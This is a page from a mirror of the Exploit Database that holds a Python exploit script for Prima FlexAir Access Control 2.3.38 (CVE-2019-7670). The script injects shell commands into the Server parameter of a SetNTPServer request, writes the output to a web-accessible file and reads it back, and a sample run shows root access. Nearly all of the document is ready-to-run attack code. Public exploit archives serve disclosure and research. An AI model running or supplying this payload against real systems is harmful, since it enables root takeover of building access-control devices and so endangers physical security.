bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/47612.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

71 lines
No EOL
2.3 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.primasystems.eu/
# Software Link: https://primasystems.eu/flexair-access-control/
# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670
#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
############################################################################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py http://10.0.251.17:8080 10167847 whoami
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
############################################################################
#
import requests
import sys#####
if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py http://10.0.0.17:8080 10167847 whoami\n'
sys.exit()
host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]
url = host+"/bin/sysfcgi.fx"
headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}
payload = ("<requests><request name=\"SetNTPServer\">"
"<param name=\"Server\" value=\"2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|\"/></request></"
"requests>")
requests.post(url, headers=headers, data=payload)
e = requests.get(host+"/app/images/logos/stage.txt")
print e.text
Reference in a new issue View git blame Copy permalink